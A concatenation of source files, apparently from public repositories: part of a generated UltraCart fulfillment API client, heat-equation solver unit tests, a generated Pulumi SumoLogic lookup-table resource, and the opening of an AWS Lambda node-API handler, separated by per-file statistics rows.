header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/fulfillment/distribution_centers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DistributionCentersResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def ship_orders(self, distribution_center_code, shipments, **kwargs): # noqa: E501
"""Mark orders as shipped # noqa: E501
Store the tracking information and mark the order shipped for this distribution center. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.ship_orders(distribution_center_code, shipments, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:param list[FulfillmentShipment] shipments: Orders to mark shipped (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.ship_orders_with_http_info(distribution_center_code, shipments, **kwargs) # noqa: E501
else:
(data) = self.ship_orders_with_http_info(distribution_center_code, shipments, **kwargs) # noqa: E501
return data
def ship_orders_with_http_info(self, distribution_center_code, shipments, **kwargs): # noqa: E501
"""Mark orders as shipped # noqa: E501
Store the tracking information and mark the order shipped for this distribution center. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.ship_orders_with_http_info(distribution_center_code, shipments, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:param list[FulfillmentShipment] shipments: Orders to mark shipped (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['distribution_center_code', 'shipments'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method ship_orders" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'distribution_center_code' is set
if ('distribution_center_code' not in params or
params['distribution_center_code'] is None):
raise ValueError("Missing the required parameter `distribution_center_code` when calling `ship_orders`") # noqa: E501
# verify the required parameter 'shipments' is set
if ('shipments' not in params or
params['shipments'] is None):
raise ValueError("Missing the required parameter `shipments` when calling `ship_orders`") # noqa: E501
collection_formats = {}
path_params = {}
if 'distribution_center_code' in params:
path_params['distribution_center_code'] = params['distribution_center_code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'shipments' in params:
body_params = params['shipments']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/fulfillment/distribution_centers/{distribution_center_code}/shipments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_inventory(self, distribution_center_code, inventories, **kwargs): # noqa: E501
"""Update inventory # noqa: E501
Update the inventory for items associated with this distribution center # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_inventory(distribution_center_code, inventories, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:param list[FulfillmentInventory] inventories: Inventory updates (limit 500) (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_inventory_with_http_info(distribution_center_code, inventories, **kwargs) # noqa: E501
else:
(data) = self.update_inventory_with_http_info(distribution_center_code, inventories, **kwargs) # noqa: E501
return data
def update_inventory_with_http_info(self, distribution_center_code, inventories, **kwargs): # noqa: E501
"""Update inventory # noqa: E501
Update the inventory for items associated with this distribution center # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_inventory_with_http_info(distribution_center_code, inventories, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:param list[FulfillmentInventory] inventories: Inventory updates (limit 500) (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['distribution_center_code', 'inventories'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_inventory" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'distribution_center_code' is set
if ('distribution_center_code' not in params or
params['distribution_center_code'] is None):
raise ValueError("Missing the required parameter `distribution_center_code` when calling `update_inventory`") # noqa: E501
# verify the required parameter 'inventories' is set
if ('inventories' not in params or
params['inventories'] is None):
raise ValueError("Missing the required parameter `inventories` when calling `update_inventory`") # noqa: E501
collection_formats = {}
path_params = {}
if 'distribution_center_code' in params:
path_params['distribution_center_code'] = params['distribution_center_code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inventories' in params:
body_params = params['inventories']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/fulfillment/distribution_centers/{distribution_center_code}/inventory', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.040602 | 555 | 0.649673 | 3,413 | 29,952 | 5.448579 | 0.075593 | 0.111314 | 0.11239 | 0.023231 | 0.93348 | 0.923855 | 0.9067 | 0.890729 | 0.878146 | 0.871155 | 0 | 0.015843 | 0.268763 | 29,952 | 664 | 556 | 45.108434 | 0.833212 | 0.359475 | 0 | 0.742297 | 1 | 0 | 0.231928 | 0.11154 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039216 | false | 0 | 0.014006 | 0 | 0.109244 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0cd257917b2770152dfdb36a0d1e25b9d128cf2d | 4,355 | py | Python | test/test_heat_equation.py | kjetil-lye/ismo_heat | 09776b740a0543e270417af653d2a047c94f1b50 | [
"MIT"
] | null | null | null | test/test_heat_equation.py | kjetil-lye/ismo_heat | 09776b740a0543e270417af653d2a047c94f1b50 | [
"MIT"
] | 6 | 2020-11-13T19:04:16.000Z | 2022-02-10T02:10:50.000Z | test/test_heat_equation.py | kjetil-lye/ismo_heat | 09776b740a0543e270417af653d2a047c94f1b50 | [
"MIT"
] | 1 | 2021-03-26T06:53:19.000Z | 2021-03-26T06:53:19.000Z | import unittest
import heat
import numpy as np
class TestHeatEquation(unittest.TestCase):
def test_zero(self):
initial_data = lambda x: 0
dt = 1 / 1024.
dx = dt
end_time = 1.25
solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time)
self.assertEqual(int(1 / dt), solution_to_heat_equation.shape[0])
self.assertTrue(np.all(solution_to_heat_equation == np.zeros_like(solution_to_heat_equation)))
def test_sine_single(self):
# we do a quick convergence test to make sure it is indeed second order
initial_data = lambda x: np.sin(np.pi * x)
resolutions = 2.0 ** np.arange(-5, -12, -1)
errors = []
end_time = 1.25
for dx in resolutions:
dt = dx
solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time)
self.assertEqual(int(1 / dx), solution_to_heat_equation.shape[0])
x = np.arange(0, 1, dx)
exact_solution = np.exp(-np.pi ** 2 * end_time) * initial_data(x)
difference_in_l2_norm = np.linalg.norm((exact_solution - solution_to_heat_equation) * dx, ord=2)
errors.append(difference_in_l2_norm)
convergence_rate = np.polyfit(np.log(resolutions), np.log(errors), 1)[0]
self.assertGreaterEqual(convergence_rate, 2)
def test_sine_three_modes(self):
# we do a quick convergence test to make sure it is indeed second order
resolutions = 2.0 ** np.arange(-5, -12, -1)
errors = []
end_time = 1.25
coefficients = [0.4, 0.2, 0.7]
for dx in resolutions:
dt = dx
initial_data = heat.InitialDataControlSine(coefficients)
solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time)
self.assertEqual(int(1 / dx), solution_to_heat_equation.shape[0])
x = np.arange(0, 1, dx)
exact_solution = initial_data.exact_solution(x, end_time)
difference_in_l2_norm = np.linalg.norm((exact_solution - solution_to_heat_equation) * dx, ord=2)
errors.append(difference_in_l2_norm)
convergence_rate = np.polyfit(np.log(resolutions), np.log(errors), 1)[0]
self.assertGreaterEqual(convergence_rate, 2)
def test_sine_single_different_coefficient(self):
# we do a quick convergence test to make sure it is indeed second order
initial_data = lambda x: np.sin(np.pi * x)
resolutions = 2.0 ** np.arange(-5, -12, -1)
errors = []
end_time = 1.25
q = 0.8
for dx in resolutions:
dt = dx
solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time, q=q)
self.assertEqual(int(1 / dx), solution_to_heat_equation.shape[0])
x = np.arange(0, 1, dx)
exact_solution = np.exp(-q * np.pi ** 2 * end_time) * initial_data(x)
difference_in_l2_norm = np.linalg.norm((exact_solution - solution_to_heat_equation) * dx, ord=2)
errors.append(difference_in_l2_norm)
convergence_rate = np.polyfit(np.log(resolutions), np.log(errors), 1)[0]
self.assertGreaterEqual(convergence_rate, 1.9)
def test_sine_three_modes_different_coefficient(self):
# we do a quick convergence test to make sure it is indeed second order
resolutions = 2.0 ** np.arange(-5, -12, -1)
errors = []
end_time = 1.25
coefficients = [0.4, 0.2, 0.7]
q = 1.3
for dx in resolutions:
dt = dx
initial_data = heat.InitialDataControlSine(coefficients)
solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time, q=q)
self.assertEqual(int(1 / dx), solution_to_heat_equation.shape[0])
x = np.arange(0, 1, dx)
exact_solution = initial_data.exact_solution(x, end_time, q)
difference_in_l2_norm = np.linalg.norm((exact_solution - solution_to_heat_equation) * dx, ord=2)
errors.append(difference_in_l2_norm)
convergence_rate = np.polyfit(np.log(resolutions), np.log(errors), 1)[0]
self.assertGreaterEqual(convergence_rate, 1.9)
if __name__ == '__main__':
unittest.main()
| 31.330935 | 108 | 0.632606 | 611 | 4,355 | 4.260229 | 0.14239 | 0.096811 | 0.086055 | 0.135229 | 0.900115 | 0.888206 | 0.877449 | 0.877449 | 0.877449 | 0.877449 | 0 | 0.033417 | 0.264753 | 4,355 | 138 | 109 | 31.557971 | 0.779513 | 0.064064 | 0 | 0.717949 | 0 | 0 | 0.001965 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 1 | 0.064103 | false | 0 | 0.038462 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e8e22a02457b1cafa6f8a1a9004a691cad8ab11b | 20,929 | py | Python | sdk/python/pulumi_sumologic/lookup_table.py | pulumi/pulumi-sumologic | 962fa056ee4b96e61a200e7bf2308bfad723c3af | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-10-13T03:50:41.000Z | 2021-10-13T03:50:41.000Z | sdk/python/pulumi_sumologic/lookup_table.py | pulumi/pulumi-sumologic | 962fa056ee4b96e61a200e7bf2308bfad723c3af | [
"ECL-2.0",
"Apache-2.0"
] | 28 | 2021-05-21T11:00:45.000Z | 2022-03-31T15:47:13.000Z | sdk/python/pulumi_sumologic/lookup_table.py | pulumi/pulumi-sumologic | 962fa056ee4b96e61a200e7bf2308bfad723c3af | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['LookupTableArgs', 'LookupTable']
@pulumi.input_type
class LookupTableArgs:
def __init__(__self__, *,
description: pulumi.Input[str],
fields: Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
parent_folder_id: Optional[pulumi.Input[str]] = None,
primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
size_limit_action: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a LookupTable resource.
:param pulumi.Input[str] description: The description of the lookup table.
:param pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]] fields: The list of fields in the lookup table.
:param pulumi.Input[str] name: The name of the lookup table.
:param pulumi.Input[str] parent_folder_id: The parent-folder-path identifier of the lookup table in the Library.
:param pulumi.Input[Sequence[pulumi.Input[str]]] primary_keys: The primary key field names.
:param pulumi.Input[int] ttl: A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
"""
pulumi.set(__self__, "description", description)
if fields is not None:
pulumi.set(__self__, "fields", fields)
if name is not None:
pulumi.set(__self__, "name", name)
if parent_folder_id is not None:
pulumi.set(__self__, "parent_folder_id", parent_folder_id)
if primary_keys is not None:
pulumi.set(__self__, "primary_keys", primary_keys)
if size_limit_action is not None:
pulumi.set(__self__, "size_limit_action", size_limit_action)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter
def description(self) -> pulumi.Input[str]:
"""
The description of the lookup table.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: pulumi.Input[str]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]]:
"""
The list of fields in the lookup table.
"""
return pulumi.get(self, "fields")
@fields.setter
def fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]]):
pulumi.set(self, "fields", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the lookup table.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="parentFolderId")
def parent_folder_id(self) -> Optional[pulumi.Input[str]]:
"""
The parent-folder-path identifier of the lookup table in the Library.
"""
return pulumi.get(self, "parent_folder_id")
@parent_folder_id.setter
def parent_folder_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parent_folder_id", value)
@property
@pulumi.getter(name="primaryKeys")
def primary_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The primary key field names.
"""
return pulumi.get(self, "primary_keys")
@primary_keys.setter
def primary_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "primary_keys", value)
@property
@pulumi.getter(name="sizeLimitAction")
def size_limit_action(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "size_limit_action")
@size_limit_action.setter
def size_limit_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size_limit_action", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input[int]]:
"""
A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl", value)
@pulumi.input_type
class _LookupTableState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
fields: Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
parent_folder_id: Optional[pulumi.Input[str]] = None,
primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
size_limit_action: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering LookupTable resources.
:param pulumi.Input[str] description: The description of the lookup table.
:param pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]] fields: The list of fields in the lookup table.
:param pulumi.Input[str] name: The name of the lookup table.
:param pulumi.Input[str] parent_folder_id: The parent-folder-path identifier of the lookup table in the Library.
:param pulumi.Input[Sequence[pulumi.Input[str]]] primary_keys: The primary key field names.
:param pulumi.Input[int] ttl: A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if fields is not None:
pulumi.set(__self__, "fields", fields)
if name is not None:
pulumi.set(__self__, "name", name)
if parent_folder_id is not None:
pulumi.set(__self__, "parent_folder_id", parent_folder_id)
if primary_keys is not None:
pulumi.set(__self__, "primary_keys", primary_keys)
if size_limit_action is not None:
pulumi.set(__self__, "size_limit_action", size_limit_action)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the lookup table.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]]:
"""
The list of fields in the lookup table.
"""
return pulumi.get(self, "fields")
@fields.setter
def fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]]):
pulumi.set(self, "fields", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the lookup table.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="parentFolderId")
def parent_folder_id(self) -> Optional[pulumi.Input[str]]:
"""
The parent-folder-path identifier of the lookup table in the Library.
"""
return pulumi.get(self, "parent_folder_id")
@parent_folder_id.setter
def parent_folder_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parent_folder_id", value)
@property
@pulumi.getter(name="primaryKeys")
def primary_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The primary key field names.
"""
return pulumi.get(self, "primary_keys")
@primary_keys.setter
def primary_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "primary_keys", value)
@property
@pulumi.getter(name="sizeLimitAction")
def size_limit_action(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "size_limit_action")
@size_limit_action.setter
def size_limit_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size_limit_action", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input[int]]:
"""
A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl", value)
class LookupTable(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
fields: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
parent_folder_id: Optional[pulumi.Input[str]] = None,
primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
size_limit_action: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Provides a [Sumologic Lookup Table](https://help.sumologic.com/05Search/Lookup_Tables).
## Example Usage
```python
import pulumi
import pulumi_sumologic as sumologic
lookup_table = sumologic.LookupTable("lookupTable",
description="some description",
fields=[
sumologic.LookupTableFieldArgs(
field_name="FieldName1",
field_type="boolean",
),
sumologic.LookupTableFieldArgs(
field_name="FieldName2",
field_type="string",
),
],
parent_folder_id="<personal folder id>",
primary_keys=["FieldName1"],
size_limit_action="DeleteOldData",
ttl=100)
```
## Attributes reference
The following attributes are exported:
- `id` - Unique identifier for the partition.
## Import
Lookup Tables can be imported using the id, e.g.hcl
```sh
$ pulumi import sumologic:index/lookupTable:LookupTable test 1234567890
```
[1]https://help.sumologic.com/05Search/Lookup_Tables
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the lookup table.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]] fields: The list of fields in the lookup table.
:param pulumi.Input[str] name: The name of the lookup table.
:param pulumi.Input[str] parent_folder_id: The parent-folder-path identifier of the lookup table in the Library.
:param pulumi.Input[Sequence[pulumi.Input[str]]] primary_keys: The primary key field names.
:param pulumi.Input[int] ttl: A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LookupTableArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a [Sumologic Lookup Table](https://help.sumologic.com/05Search/Lookup_Tables).
## Example Usage
```python
import pulumi
import pulumi_sumologic as sumologic
lookup_table = sumologic.LookupTable("lookupTable",
description="some description",
fields=[
sumologic.LookupTableFieldArgs(
field_name="FieldName1",
field_type="boolean",
),
sumologic.LookupTableFieldArgs(
field_name="FieldName2",
field_type="string",
),
],
parent_folder_id="<personal folder id>",
primary_keys=["FieldName1"],
size_limit_action="DeleteOldData",
ttl=100)
```
## Attributes reference
The following attributes are exported:
- `id` - Unique identifier for the partition.
## Import
Lookup Tables can be imported using the id, e.g.hcl
```sh
$ pulumi import sumologic:index/lookupTable:LookupTable test 1234567890
```
[1]https://help.sumologic.com/05Search/Lookup_Tables
:param str resource_name: The name of the resource.
:param LookupTableArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LookupTableArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
fields: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
parent_folder_id: Optional[pulumi.Input[str]] = None,
primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
size_limit_action: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LookupTableArgs.__new__(LookupTableArgs)
if description is None and not opts.urn:
raise TypeError("Missing required property 'description'")
__props__.__dict__["description"] = description
__props__.__dict__["fields"] = fields
__props__.__dict__["name"] = name
__props__.__dict__["parent_folder_id"] = parent_folder_id
__props__.__dict__["primary_keys"] = primary_keys
__props__.__dict__["size_limit_action"] = size_limit_action
__props__.__dict__["ttl"] = ttl
super(LookupTable, __self__).__init__(
'sumologic:index/lookupTable:LookupTable',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
fields: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
parent_folder_id: Optional[pulumi.Input[str]] = None,
primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
size_limit_action: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None) -> 'LookupTable':
"""
Get an existing LookupTable resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the lookup table.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LookupTableFieldArgs']]]] fields: The list of fields in the lookup table.
:param pulumi.Input[str] name: The name of the lookup table.
:param pulumi.Input[str] parent_folder_id: The parent-folder-path identifier of the lookup table in the Library.
:param pulumi.Input[Sequence[pulumi.Input[str]]] primary_keys: The primary key field names.
:param pulumi.Input[int] ttl: A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _LookupTableState.__new__(_LookupTableState)
__props__.__dict__["description"] = description
__props__.__dict__["fields"] = fields
__props__.__dict__["name"] = name
__props__.__dict__["parent_folder_id"] = parent_folder_id
__props__.__dict__["primary_keys"] = primary_keys
__props__.__dict__["size_limit_action"] = size_limit_action
__props__.__dict__["ttl"] = ttl
return LookupTable(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
The description of the lookup table.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def fields(self) -> pulumi.Output[Optional[Sequence['outputs.LookupTableField']]]:
"""
The list of fields in the lookup table.
"""
return pulumi.get(self, "fields")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the lookup table.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="parentFolderId")
def parent_folder_id(self) -> pulumi.Output[Optional[str]]:
"""
The parent-folder-path identifier of the lookup table in the Library.
"""
return pulumi.get(self, "parent_folder_id")
@property
@pulumi.getter(name="primaryKeys")
def primary_keys(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The primary key field names.
"""
return pulumi.get(self, "primary_keys")
@property
@pulumi.getter(name="sizeLimitAction")
def size_limit_action(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "size_limit_action")
@property
@pulumi.getter
def ttl(self) -> pulumi.Output[Optional[int]]:
"""
A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
"""
return pulumi.get(self, "ttl")
| 42.026104 | 245 | 0.636629 | 2,457 | 20,929 | 5.224664 | 0.082214 | 0.100257 | 0.068708 | 0.056555 | 0.863052 | 0.843343 | 0.834697 | 0.825115 | 0.81826 | 0.813508 | 0 | 0.004577 | 0.258732 | 20,929 | 497 | 246 | 42.110664 | 0.82287 | 0.332887 | 0 | 0.78327 | 1 | 0 | 0.09594 | 0.004967 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159696 | false | 0.003802 | 0.026616 | 0.011407 | 0.281369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e8e49b6c08b5ea6ce218711e8a51102a2b941f86 | 9,933 | py | Python | handlers/node_api.py | HathorNetwork/hathor-explorer-service | 81236deceac12ddfd813b33723481421a9064c82 | [
"MIT"
] | null | null | null | handlers/node_api.py | HathorNetwork/hathor-explorer-service | 81236deceac12ddfd813b33723481421a9064c82 | [
"MIT"
] | 51 | 2021-05-21T18:58:15.000Z | 2022-03-29T17:45:00.000Z | handlers/node_api.py | HathorNetwork/hathor-explorer-service | 81236deceac12ddfd813b33723481421a9064c82 | [
"MIT"
] | 1 | 2022-02-08T21:15:26.000Z | 2022-02-08T21:15:26.000Z | import json
from typing import Optional
from aws_lambda_context import LambdaContext
from common.errors import ApiError
from usecases.node_api import NodeApi
from utils.wrappers.aws.api_gateway import ApiGateway, ApiGatewayEvent
UNKNOWN_ERROR_MSG = {"error": "unknown_error"}
@ApiGateway()
def get_address_balance(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
